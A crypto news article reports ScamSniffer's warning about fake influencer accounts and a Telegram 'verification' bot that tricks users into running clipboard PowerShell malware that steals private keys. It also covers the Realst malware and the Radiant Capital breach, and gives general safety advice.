Scam Sniffer Warns of Fake Influencers and Telegram Bots Spreading Crypto Malware

ScamSniffer, a leading Web3 security firm, has issued a warning about a new scam targeting cryptocurrency users. This sophisticated attack combines fake social media accounts with malicious Telegram bots to deploy cryptocurrency-stealing malware, preying on unsuspecting individuals.
The Scam Process: Fake Influencers and Malicious Telegram Bots
The scam begins with bad actors creating fake X (formerly Twitter) accounts that mimic well-known cryptocurrency influencers. These fake accounts promote Telegram groups that promise exclusive investment advice. To further the illusion of legitimacy, the scammer’s posts are often linked under the influencers' real accounts.
Once an unsuspecting user clicks the invite link and joins the Telegram group, they are prompted to verify their identity using a Telegram verification bot called “OfficialSafeguardBot.” This bot attempts to create a sense of urgency by giving users a limited amount of time to complete a captcha.
However, during this process, the bot injects malicious PowerShell code—a scripting language often used for task automation in Windows—into the victim’s clipboard. As the bot instructs the user to execute this code in the guise of a necessary verification step, victims unknowingly run the malicious code on their system, allowing the malware to steal sensitive data, including private keys.
Malware’s Impact and Evasion Techniques
ScamSniffer reports that this malware has already stolen private keys from numerous victims, with the malicious code evading detection by several antivirus programs. Only VirusTotal, a popular malware scanning service, has flagged the attack as harmful.
To protect themselves from such scams, ScamSniffer advises users to rely on hardware wallets, avoid running unknown commands, and refrain from installing unverified software.
Surge in Impersonation and Scams
This latest warning follows ScamSniffer’s earlier alert in December regarding an increase in fake X accounts. Impersonation scams have spiked by over 87% since November, with some victims losing upwards of $3 million by clicking on malicious links shared by these fake accounts.
The rise in crypto scams coincides with the ongoing surge in Bitcoin’s price and a broader increase in altcoin investments. As the cryptocurrency market grows in value, it has become an increasingly attractive target for scammers.
Other Recent Malware Threats
In addition to the Telegram-based attack, Cado Security Labs flagged a new strain of malware known as "Realst" on December 9. This malware infiltrates users' systems through a fake meeting application, luring victims into believing they need to download it for a legitimate business opportunity or communication with a trusted contact. Once installed, the malware steals crypto assets, credentials, banking card details, and other sensitive information.
Earlier in October, Radiant Capital, a decentralized finance protocol, suffered a significant breach, losing over $50 million. The attack involved social engineering tactics, with an infected PDF file promoted via Telegram by an attacker impersonating a trusted contractor.
How to Stay Safe
As cybercriminals continue to target the cryptocurrency sector, users are urged to stay vigilant. Avoid clicking on suspicious links, be cautious about downloading unverified software, and always verify the legitimacy of platforms and services before engaging in any transactions. The rise in sophisticated scams and malware highlights the growing need for enhanced security measures in the digital asset space.
Disclaimer: The content on this website is for informational purposes only and does not constitute financial or investment advice. We do not endorse any project or product. Readers should conduct their own research and assume full responsibility for their decisions. We are not liable for any loss or damage arising from reliance on the information provided. Crypto investments carry risks.